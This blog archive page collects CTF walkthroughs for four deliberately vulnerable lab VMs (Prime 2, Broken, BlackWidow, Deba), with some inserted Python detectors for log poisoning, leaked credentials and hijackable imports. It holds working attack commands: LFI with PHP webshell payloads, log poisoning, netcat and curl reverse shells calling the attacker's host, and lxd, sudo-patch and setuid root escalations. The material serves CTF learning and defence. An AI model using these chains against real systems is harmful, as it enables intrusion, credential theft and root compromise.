Category archive: Life and Thoughts
Vulnhub Prime (2021): 2 Walkthrough
https://www.vulnhub.com/entry/prime-2021-2,696/
Scan ports.
# Nmap 7.91 scan initiated Wed May 12 17:59:43 2021 as: nmap -sV -sC -p- -oN ports.log 192.168.33.139
Nmap scan report for 192.168.33.139 (192.168.33.139)
Host is up (0.0041s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Ubuntu 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 0a:16:3f:c8:1a:7d:ff:f5:7a:66:05:63:76:7c:5a:95 (RSA)
| 256 7f:47:44:cc:d1:c4:b7:54:de:4f:27:f2:39:38:ff:6e (ECDSA)
|_ 256 f5:d3:36:44:43:40:3d:11:9b:d1:a6:24:9f:99:93:f7 (ED25519)
80/tcp open http Apache httpd 2.4.46 ((Ubuntu))
|_http-server-header: Apache/2.4.46 (Ubuntu)
|_http-title: HackerCTF
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
10123/tcp open http SimpleHTTPServer 0.6 (Python 3.9.4)
|_http-server-header: SimpleHTTP/0.6 Python/3.9.4
|_http-title: Directory listing for /
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: 7h59m59s
|_nbstat: NetBIOS name: HACKERCTFLAB, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-05-12T18:00:05
|_ start_date: N/A
List the SMB shares.
smbclient -L 192.168.33.139
Enter WORKGROUP\kali's password:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
welcome Disk Welcome to Hackerctf LAB
IPC$ IPC IPC Service (hackerctflab server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
Found shell.php in /upload.
smbclient '\\192.168.33.139\welcome'
Enter WORKGROUP\kali's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu May 13 04:27:52 2021
.. D 0 Sat May 8 02:38:58 2021
.mysql_history H 18 Sat May 8 15:05:03 2021
.ssh DH 0 Thu May 13 04:29:18 2021
.profile H 807 Sat Mar 20 00:02:58 2021
upload D 0 Sun May 9 19:19:02 2021
.sudo_as_admin_successful H 0 Sat May 8 13:34:48 2021
.bash_logout H 220 Sat Mar 20 00:02:58 2021
.cache DH 0 Sat May 8 02:39:15 2021
something N 82 Sat May 8 00:18:09 2021
secrets N 0 Sat May 8 00:15:17 2021
.bash_history H 72 Sun May 9 19:23:26 2021
.bashrc H 3771 Sat Mar 20 00:02:58 2021
19475088 blocks of size 1024. 9885876 blocks available
smb: \> cd upload
smb: \upload\> dir
. D 0 Sun May 9 19:19:02 2021
.. D 0 Thu May 13 04:27:52 2021
shell.php A 35 Sun May 9 19:19:02 2021
19475088 blocks of size 1024. 9885872 blocks available
smb: \upload\> get shell.php
getting file \upload\shell.php of size 35 as shell.php (6.8 KiloBytes/sec) (average 6.8 KiloBytes/sec)
smb: \upload\>
Check shell.php.
cat shell.php
<?php echo system($_GET['cmd']);?>
Found the user name jarves.
cat something
I wanted to make it my home directory. But idea must be changed.
Thanks,
jarves
Scan directories on port 80.
cat 80.log
/css (Status: 301) [Size: 314] [--> http://192.168.33.139/css/]
/server (Status: 301) [Size: 317] [--> http://192.168.33.139/server/]
/wp (Status: 301) [Size: 313] [--> http://192.168.33.139/wp/]
/index.html (Status: 200) [Size: 5761]
/images (Status: 301) [Size: 317] [--> http://192.168.33.139/images/]
/javascript (Status: 301) [Size: 321] [--> http://192.168.33.139/javascript/]
Run wpscan against the WordPress install: it finds one user and one vulnerable plugin.
wpscan --url http://192.168.33.139/wp/ -e u,ap --no-banner --api-token yourtoken --force --plugins-detection aggressive
...
[+] gracemedia-media-player
 | Location: http://192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2013-07-21T15:09:00.000Z
 | Readme: http://192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/readme.txt
 | [!] Directory listing is enabled
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/, status: 200
 |
 | [!] 1 vulnerability identified:
 |
 | [!] Title: GraceMedia Media Player 1.0 - Local File Inclusion (LFI)
 |     References:
 |      - https://wpscan.com/vulnerability/a4f5b10f-3386-45cc-9548-dd7bbea199d6
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618
 |      - https://www.exploit-db.com/exploits/46537/
 |      - https://seclists.org/fulldisclosure/2019/Mar/26
...
[i] User(s) Identified:
[+] admin
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
The plugin has an LFI vulnerability, and searchsploit has the matching entry.
searchsploit gracemedia
--------------------------------------------------------------------- ----------------------
 Exploit Title                                                       |  Path
--------------------------------------------------------------------- ----------------------
WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion  | php/webapps/46537.txt
--------------------------------------------------------------------- ----------------------
Check that the LFI works.
curl '192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd'
root:x:0:0:root:/root:/bin/bash
...
jarves:x:1000:1000:jarves:/home/jarves:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
...
Now include shell.php from the SMB share through the same LFI and pass a command in cmd. The output appears twice because system() prints it and echo then prints system()'s return value (the last line of output).
curl '192.168.33.139/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../home/jarves/upload/shell.php&cmd=id'
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Send a reverse-shell command through the same cmd parameter and catch it with a listener.
nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.33.139.
Ncat: Connection from 192.168.33.139:49084.
bash: cannot set terminal process group (971): Inappropriate ioctl for device
bash: no job control in this shell
<t/plugins/gracemedia-media-player/templates/files$
<t/plugins/gracemedia-media-player/templates/files$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
The welcome share is evidently jarves's home directory (.profile, .bashrc and .ssh are in it), so another way in is to upload an authorized_keys file over SMB and log in over SSH as jarves directly.
smbclient '\\192.168.33.139\welcome'
...
smb: \> mkdir .ssh
smb: \> cd .ssh
smb: .ssh\> put authorized_keys
putting file authorized_keys as .ssh\authorized_keys (183.9 kb/s) (average 183.9 kb/s)
smb: .ssh\> chmod 600 authorized_keys
Server doesn't support UNIX CIFS calls.
The chmod fails because the server has no UNIX extensions, but sshd still accepts the key and we get a shell as jarves. Check jarves's groups.
jarves@hackerctflab:~$ id
uid=1000(jarves) gid=1000(jarves) groups=1000(jarves),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)
jarves is in the lxd group, so use the classic lxd privilege escalation: a member of that group can start a privileged container with the host's root filesystem mounted inside it. An Alpine image is imported for this.
lxc image import ./alpine-v3.13-x86_64-20210405_2328.tar.gz --alias myimage
lxd init alpine:v3.12 mypool
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
Now we are root.
jarves@hackerctflab:~$ lxc exec ignite /bin/sh
~ # id
uid=0(root) gid=0(root)
From inside the container, write our authorized_keys into /mnt/root/root/.ssh (the host's /root/.ssh), then log in over SSH as root.
ssh root@192.168.33.139
...
root@hackerctflab:~# id;hostname
uid=0(root) gid=0(root) groups=0(root)
hackerctflab
HackMyVm Broken Walkthrough
https://hackmyvm.eu/machines/machine.php?vm=Broken
Scan ports.
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 1b:8d:f3:e3:56:64:af:54:df:10:f8:39:ac:ad:c9:2f (RSA)
| 256 77:c1:f3:e4:6b:96:0f:1e:5c:24:2e:4d:3e:4a:09:80 (ECDSA)
|_ 256 88:05:ef:7a:04:56:f0:59:62:a5:f8:40:32:24:8a:17 (ED25519)
80/tcp open http nginx 1.14.2
| http-robots.txt: 1 disallowed entry
|_/textpattern
|_http-server-header: nginx/1.14.2
|_http-title: Site doesn't have a title (text/html).
Scan port 80.
gobuster dir -u http://192.168.56.100 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard -o 80.log
...
/index.html (Status: 200) [Size: 3]
/file.php (Status: 200) [Size: 0]
/robots.txt (Status: 200) [Size: 23]
robots.txt tells us there is a Textpattern CMS.
cat robots.txt
Disallow: /textpattern
Fuzz the parameter name of file.php for LFI.
wfuzz -u 'http://broken/file.php?FUZZ=../../../../../etc/passwd' -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt --hh 0
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000007535: 200 27 L 40 W 1451 Ch "file"
Check passwd.
curl 'http://broken/file.php?file=../../../../etc/passwd'
root:x:0:0:root:/root:/bin/bash
...
heart:x:1000:1000:heart,,,:/home/heart:/bin/bash
...
Write PHP code into the nginx access log through the User-Agent string.
curl 'http://broken' -A '<?php system($_GET[c]); ?>'
:(
Check if shell code works.
curl 'http://broken/file.php?file=../../../../var/log/nginx/access.log&c=id'
...
192.168.56.150 - - [26/May/2021:22:44:55 -0400] "GET / HTTP/1.1" 200 3 "-" "uid=33(www-data) gid=33(www-data) groups=33(www-data)
Now send a reverse-shell command through the same parameter.
curl 'http://broken/file.php?file=../../../../var/log/nginx/access.log&c=nc%20192.168.56.150%201234%20-e%20/bin/bash'
In another terminal, listen to port and get shell.
nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:50004.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Check sudo.
www-data@broken:~/html/textpattern/textpattern$ sudo -l
sudo -l
Matching Defaults entries for www-data on broken:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on broken:
(heart) NOPASSWD: /usr/bin/pydoc3.7
Run pydoc3.7 as heart: it pages its output through less, so the pager's !command escape gives a shell as heart.
www-data@broken:/home/heart$ sudo -u heart /usr/bin/pydoc3.7 os
...
:!/bin/sh
...
$ id
id
uid=1000(heart) gid=1000(heart) groups=1000(heart),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
$ pwd
pwd
/home/heart
$
Check sudo again.
heart@broken:~$ sudo -l
Matching Defaults entries for heart on broken:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User heart may run the following commands on broken:
(ALL) NOPASSWD: /usr/bin/patch
Use patch to add a user root2 with uid 0 to /etc/passwd. openssl passwd without a digest option produces a traditional crypt hash, which the system still accepts; putting it in the second field of passwd bypasses /etc/shadow.
heart@broken:~$ cp /etc/passwd ./passwd_new
heart@broken:~$ openssl passwd mypass
qQdUCJYw6ARL6
heart@broken:~$ echo 'root2:qQdUCJYw6ARL6:0:0:root:/root:/bin/bash' >> passwd_new
heart@broken:~$ diff -u /etc/passwd ./passwd_new > passwd_patch
heart@broken:~$ sudo patch -i ./passwd_patch /etc/passwd
patching file /etc/passwd
heart@broken:~$ su root2
Password:
root@broken:/home/heart# id;hostname
uid=0(root) gid=0(root) groups=0(root)
broken
root@broken:/home/heart#
HackMyVm BlackWidow Walkthrough
https://hackmyvm.eu/machines/machine.php?vm=BlackWidow
Nmap scan ports.
nmap -sV -sC -p- -oN ports.log 192.168.56.100
Nmap scan report for 192.168.56.100 (192.168.56.100)
Host is up (0.0024s latency).
Not shown: 65526 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
...
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp open rpcbind 2-4 (RPC #100000)
...
2049/tcp open nfs_acl 3 (RPC #100227)
3128/tcp open http-proxy Squid http proxy 4.6
|_http-server-header: squid/4.6
|_http-title: ERROR: The requested URL could not be retrieved
38425/tcp open mountd 1-3 (RPC #100005)
41727/tcp open mountd 1-3 (RPC #100005)
43429/tcp open nlockmgr 1-4 (RPC #100021)
55311/tcp open mountd 1-3 (RPC #100005)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Check port 80.
gobuster dir -u http://192.168.56.100 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard -o 80.log
===============================================================
/index.html (Status: 200) [Size: 84]
/docs (Status: 301) [Size: 315] [--> http://192.168.56.100/docs/]
/company (Status: 301) [Size: 318] [--> http://192.168.56.100/company/]
/js (Status: 301) [Size: 313] [--> http://192.168.56.100/js/]
Check /company, found started.php.
gobuster dir -u http://192.168.56.100/company -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard -o 80_company.log
===============================================================
/index.html (Status: 200) [Size: 42271]
/assets (Status: 301) [Size: 325] [--> http://192.168.56.100/company/assets/]
/forms (Status: 301) [Size: 324] [--> http://192.168.56.100/company/forms/]
/changelog.txt (Status: 200) [Size: 1175]
/Readme.txt (Status: 200) [Size: 222]
/started.php (Status: 200) [Size: 42271]
Check the source of /company/index.html.
<!-- =======================================================
* Template Name: Arsha - v3.0.3
* Template URL: https://bootstrapmade.com/arsha-free-bootstrap-html-template-corporate/
* Author: BootstrapMade.com
* License: https://bootstrapmade.com/license/
========================================================
We are working to develop a php inclusion method using "file" parameter - Black Widow DevOps Team.
-->
Fuzz the file parameter of started.php for LFI.
wfuzz -u 'http://192.168.56.100/company/started.php?file=FUZZ' -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-LFISuite-pathtotest.txt --hh 0
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000060: 200 29 L 43 W 1582 Ch "../../../../../../../../../../../../../etc/passwd"
000000062: 200 29 L 43 W 1582 Ch "../../../../../../../../../../../../../../../../etc/passwd"
000000061: 200 29 L 43 W 1582 Ch "../../../../../../../../../../../../../../etc/passwd"
000000403: 200 55 L 55 W 727 Ch "../../../../../../../../../../../../../etc/group"
000000404: 200 55 L 55 W 727 Ch "../../../../../../../../../../../../../../etc/group"
We can read /etc/passwd now.
~ curl 'http://192.168.56.100/company/started.php?file=../../../../../../../../../../../../../etc/passwd'
root:x:0:0:root:/root:/bin/bash
...
viper:x:1001:1001:Viper,,,:/home/viper:/bin/bash
...
Next, fuzz for log files we can read.
wfuzz -u "http://192.168.56.100/company/started.php?file=../../../../../../../../../../../../..FUZZ" -w /usr/share/wordlists/logfiles.txt
...
000000031: 200 0 L 0 W 0 Ch "/var/log/vsftpd.log"
000000030: 200 0 L 0 W 0 Ch "/var/log/error.log"
000000032: 200 0 L 0 W 0 Ch "/var/log/message"
000000023: 200 0 L 0 W 0 Ch "/usr/local/apache/logs/error_log"
000000025: 200 0 L 0 W 0 Ch "/var/log/apache/error_log"
000000026: 200 0 L 0 W 0 Ch "/var/log/apache2/error_log"
000000018: 500 0 L 0 W 0 Ch "/var/log/apache2/access.log"
Note that /var/log/apache2/access.log returns 500 while every other path returns 200 with 0 chars (missing or unreadable). The 500 is because we ran gobuster several times and the access log had grown too large for the include to handle. We reset the VM to its original snapshot; then the file can be read through the LFI.
The User-Agent string is written to that log, so it can carry PHP code.
curl 'http://192.168.56.100/company/started.php?file=../../../../../../../../../../../../../../../../var/log/apache2/access.log'
192.168.56.150 - - [25/May/2021:04:24:36 -0400] "GET /company/started.php?file=../../../../../../../../../../../../../../../../var/log/apache2/access.log HTTP/1.1" 200 147 "-" "curl/7.74.0"
192.168.56.150 - - [25/May/2021:04:24:40 -0400] "GET /company/started.php?file=../../../../../../../../../../../../../../../../var/log/apache2/access.log HTTP/1.1" 200 147 "-" "curl/7.74.0"
192.168.56.150 - - [25/May/2021:04:24:46 -0400] "GET /company/started.php HTTP/1.1" 200 7291 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0"
192.168.56.150 - - [25/May/2021:04:24:49 -0400] "GET /company/started.php?file=../../../../../../../../../../../../../../../../var/log/apache2/access.log HTTP/1.1" 200 147 "-" "curl/7.74.0"
Set user agent to php shell code, and check if it works.
curl -A '<?php system($_GET[c]); ?>' http://192.168.56.100
<html>
<img src="wallpaper.jpg" alt="wallpaper" width="100%" height="100%">
</html>
curl 'http://192.168.56.100/company/started.php?file=../../../../../../../../../../../../../../../../var/log/apache2/access.log&c=id'
192.168.56.150 - - [25/May/2021:04:25:25 -0400] "GET / HTTP/1.1" 200 334 "-" "uid=33(www-data) gid=33(www-data) groups=33(www-data)
"
192.168.56.150 - - [25/May/2021:04:25:29 -0400] "GET /company/started.php?file=../../../../../../../../../../../../../../../../var/log/apache2/access.log HTTP/1.1" 200 251 "-" "curl/7.74.0"
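The log-poisoning chain above (and the same one on Broken) leaves two traces in the access log: a path traversal in the request line and PHP in the User-Agent. Note that reading the log back through the LFI shows only the command output, because the include evaluates the PHP; the raw file on disk still contains the `<?php ... ?>` tag. The detector below is an added example, not code from this walkthrough; it runs over constructed lines shaped like the ones above, and the regexes and tag names are my own choices.

```python
#!/usr/bin/env python3
"""Flag LFI traversal and log-poisoning attempts in a combined-format access
log (Apache or nginx). Added example, not code from the original walkthrough."""
import re
from urllib.parse import unquote

# host ident user [time] "request" status size "referer" "user-agent"
# (the closing quote of the user-agent is optional so truncated lines still parse)
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>.*?)"?\s*$'
)
TRAVERSAL_RE = re.compile(r'(\.\./){2,}|/etc/passwd|/proc/self/environ', re.I)
LOG_PATH_RE = re.compile(r'/var/log/|access\.log|error\.log|auth\.log', re.I)
PHP_RE = re.compile(r'<\?(php|=)|\b(system|passthru|shell_exec|exec|eval)\s*\(', re.I)


def parse(line):
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def classify(line):
    """Sorted list of findings for one log line (empty if it looks benign)."""
    rec = parse(line)
    if rec is None:
        return ["unparsable"]
    # decode twice so %2e%2e%2f and double-encoded variants are caught as well
    req = unquote(unquote(rec["req"]))
    tags = set()
    if TRAVERSAL_RE.search(req):
        tags.add("lfi_traversal")
    if LOG_PATH_RE.search(req):
        tags.add("log_inclusion")
    # the injected code sits in the User-Agent (or Referer); inspect the raw field,
    # since that is what lands on disk and gets evaluated when the log is included
    if PHP_RE.search(rec["ua"]) or PHP_RE.search(rec["ref"]):
        tags.add("php_in_header")
    return sorted(tags)


def scan(lines):
    return [classify(line) for line in lines]


# Constructed sample lines in the shape of the ones seen on the target
SAMPLE = [
    '192.168.56.150 - - [25/May/2021:04:24:36 -0400] "GET /company/started.php?file=../../../../../../../../var/log/apache2/access.log HTTP/1.1" 200 147 "-" "curl/7.74.0"',
    '192.168.56.150 - - [25/May/2021:04:25:25 -0400] "GET / HTTP/1.1" 200 334 "-" "<?php system($_GET[c]); ?>"',
    '192.168.56.150 - - [25/May/2021:04:26:01 -0400] "GET /company/started.php?file=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1582 "-" "curl/7.74.0"',
    '192.168.56.150 - - [25/May/2021:04:24:46 -0400] "GET /company/started.php HTTP/1.1" 200 7291 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0"',
]

if __name__ == "__main__":
    for line, tags in zip(SAMPLE, scan(SAMPLE)):
        print(tags or ["clean"], line[:80])
```

Run it against a real log with `scan(open(path).read().splitlines())`; a line tagged both `lfi_traversal` and `log_inclusion` after one tagged `php_in_header` from the same client is the exact sequence used above.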
To get a reverse shell I tried several ways; the one that worked was this. Run a temporary HTTP server locally with a PHP reverse shell named "r" in its document root.
sudo php -S 0.0.0.0:80
[Tue May 25 19:53:10 2021] PHP 7.4.15 Development Server (http://0.0.0.0:80) started
[Tue May 25 19:54:43 2021] 192.168.56.100:39630 Accepted
[Tue May 25 19:54:43 2021] 192.168.56.100:39630 [200]: (null) /r
[Tue May 25 19:54:43 2021] 192.168.56.100:39630 Closing
On the VM, use the poisoned log to curl the reverse shell "r" from our server and save it as r.php; the command runs in the directory of started.php, so r.php lands in /company.
curl 'http://192.168.56.100/company/started.php?file=../../../../../../../../../../../../../../../../var/log/apache2/access.log&c=curl%20http://192.168.56.150/r%20-o%20r.php'
Visit the php shell.
curl http://192.168.56.100/company/r.php
Then we get reverse shell.
nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:48366.
Linux blackwidow 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64 GNU/Linux
05:01:50 up 37 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
In /var/backups/auth.log there is a failed SSH login where a password was typed into the username field; ?V1p3r2020!? is viper's password. (I think this step is the hardest.)
Dec 12 16:56:34 test sshd[29558]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.1.109 user=viper
Dec 12 16:56:43 test sshd[29560]: Invalid user ?V1p3r2020!? from 192.168.1.109 port 7090
Dec 12 16:56:44 test sshd[29560]: pam_unix(sshd:auth): check pass; user unknown
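A password typed into the login prompt ends up in auth.log as `Invalid user <password> from <ip>`, which is why the line above stands out. The following check, an added example rather than anything from the walkthrough, pulls those entries and keeps the ones whose "username" cannot be a valid account name; the sample lines are constructed after the ones above, and the username rule is Debian's default adduser pattern.

```python
#!/usr/bin/env python3
"""Find passwords typed into the SSH username field, which sshd records in
auth.log as "Invalid user <password> from <ip>". Added example, not from the page."""
import re

INVALID_USER_RE = re.compile(
    r'sshd\[\d+\]: Invalid user (?P<user>.*?) from (?P<src>\S+)(?: port \d+)?\s*$'
)
# Debian's default adduser rule: lowercase letters, digits, underscore, dash, optional trailing $
VALID_USERNAME_RE = re.compile(r'[a-z_][a-z0-9_-]{0,31}\$?')


def looks_like_secret(name):
    """A 'username' that cannot be a real account name is probably a mistyped password."""
    return VALID_USERNAME_RE.fullmatch(name) is None


def leaked_credentials(lines):
    """(candidate password, source address) for every suspicious Invalid user line."""
    hits = []
    for line in lines:
        m = INVALID_USER_RE.search(line)
        if m and looks_like_secret(m.group("user")):
            hits.append((m.group("user"), m.group("src")))
    return hits


# Constructed sample in the shape of the auth.log excerpt above
SAMPLE = [
    "Dec 12 16:56:34 test sshd[29558]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.1.109 user=viper",
    "Dec 12 16:56:43 test sshd[29560]: Invalid user ?V1p3r2020!? from 192.168.1.109 port 7090",
    "Dec 12 16:57:01 test sshd[29562]: Invalid user admin from 192.168.1.109 port 7091",
    "Dec 12 16:57:05 test sshd[29564]: Invalid user backup-2 from 192.168.1.109 port 7092",
]

if __name__ == "__main__":
    for secret, src in leaked_credentials(SAMPLE):
        print(f"possible password {secret!r} typed as username from {src}")
```

The preceding `PAM ... user=viper` line tells you which account the attempt most likely belongs to, so pairing the two by pid or timestamp is the natural next step.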
Check bash history of viper.
viper@blackwidow:~$ cat .bash_history
...
arsenic -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
ls
./arsenic -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
su root
Search for a file named arsenic.
viper@blackwidow:~$ find / -name arsenic 2>/dev/null
/home/viper/backup_site/assets/vendor/weapon/arsenic
arsenic is a copy of the perl interpreter (the -e one-liner is Perl) that is evidently setuid root, so running it with setuid(0) gives a root shell.
viper@blackwidow:~$ /home/viper/backup_site/assets/vendor/weapon/arsenic -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
# id
uid=0(root) gid=1001(viper) groups=1001(viper)
HackMyVm Deba Walkthrough
https://hackmyvm.eu/machines/machine.php?vm=Deba
Scan ports, found 22, 80 and 3000 are open.
# Nmap 7.91 scan initiated Fri May 14 08:30:51 2021 as: nmap -sV -sC -p- -oN ports.log 192.168.56.100
Nmap scan report for 192.168.56.100 (192.168.56.100)
Host is up (0.0012s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 22:e4:1e:f3:f6:82:7b:26:da:13:2f:01:f9:d5:0d:5b (RSA)
| 256 7b:09:3e:d4:a7:2d:92:01:9d:7d:7f:32:c1:fd:93:5b (ECDSA)
|_ 256 56:fd:3d:c2:19:fe:22:24:ca:2c:f8:07:90:1d:76:87 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
3000/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
Scan port 80: nothing of interest. Port 3000 is a Node.js site.
[image-20210524174309208.png]
It uses node-serialize, whose unserialize() evals any string value beginning with _$$ND_FUNC$$_ (CVE-2017-5941); a serialized object carrying a self-invoking function therefore runs code on the server. Use the classic Node.JS 'node-serialize' remote code execution PoC at https://www.exploit-db.com/exploits/49552.
Get a reverse shell as www-data. Check sudo.
www-data@debian:/home/low$ sudo -l
sudo -l
Matching Defaults entries for www-data on debian:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on debian:
(ALL : low) NOPASSWD: /usr/bin/python3 /home/low/scripts/script.py
Check the files in /home/low/scripts: script.py imports main, and main.py is owned by www-data, so we can write it.
www-data@debian:/home/low/scripts$ ls -la
ls -la
total 16
drwxr-xr-x 2 low low 4096 may 7 17:59 .
drwxr-xr-x 8 low low 4096 may 7 23:45 ..
-rwxr-xr-x 1 www-data www-data 88 may 7 10:57 main.py
-rw-r--r-- 1 low low 80 may 7 10:44 script.py
www-data@debian:/home/low/scripts$ cat script.py
cat script.py
import main
import os
print("\n")
os.system("ip a | grep enp0s3")
print("\n")
www-data@debian:/home/low/scripts$ cat main.py
cat main.py
from os import system as main
print("\n")
print("Just main")
main("whoami")
print("\n")
Replace main.py with something that spawns a shell, then run script.py through sudo as low. Python puts the script's own directory first on sys.path, so import main in script.py loads our main.py.
echo 'import os;os.system("/bin/bash");' > main.py
sudo -u low python3 /home/low/scripts/script.py
low@debian:~/scripts$ id
id
uid=1001(low) gid=1001(low) grupos=1001(low)
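The sudo rule above is safe only if every module script.py imports is owned by root or by low; main.py sitting next to it and owned by www-data is what breaks it. The audit below is an added example, not part of the walkthrough: it parses a script's imports, resolves each one the way the interpreter does (script directory first), and reports modules that someone other than root or the script's owner could change. The demo() function rebuilds the two files from the page in a temporary directory and uses a world-writable main.py as a stand-in for the www-data ownership, since a test cannot chown.

```python
#!/usr/bin/env python3
"""Audit a script that sudo lets us run as another user: can any of its
imports be satisfied by a file we are able to modify? Added example; not code
from the original walkthrough."""
import ast
import importlib.machinery
import os
import stat
import sys
import tempfile
from pathlib import Path


def imported_names(script):
    """Top-level module names a script imports (import x / from x import y)."""
    tree = ast.parse(Path(script).read_text())
    names = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            names.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return sorted(names)


def resolve(name, script_dir):
    """Where 'import name' would load from. The script's own directory is searched
    first, exactly as the interpreter does (it becomes sys.path[0])."""
    spec = importlib.machinery.PathFinder.find_spec(name, [str(script_dir), *sys.path])
    if spec is None or not spec.origin or not os.path.isfile(spec.origin):
        return None  # built-in/frozen module or namespace package: nothing on disk to tamper with
    return Path(spec.origin)


def weaknesses(path, trusted_uid):
    """Reasons a module file could be changed by someone other than root or the target user."""
    st = path.stat()
    out = []
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        out.append("group- or world-writable")
    if st.st_uid not in (0, trusted_uid):
        out.append(f"owned by uid {st.st_uid}, not root or uid {trusted_uid}")
    dmode = path.parent.stat().st_mode
    if dmode & stat.S_IWOTH and not dmode & stat.S_ISVTX:
        out.append("parent directory world-writable")  # a shadowing module could be dropped in
    return out


def audit(script):
    """{module: (path, [reasons])} for every import that can be hijacked."""
    script = Path(script).resolve()
    trusted_uid = script.stat().st_uid  # the user the script is meant to run as
    findings = {}
    for name in imported_names(script):
        target = resolve(name, script.parent)
        if target is not None:
            reasons = weaknesses(target, trusted_uid)
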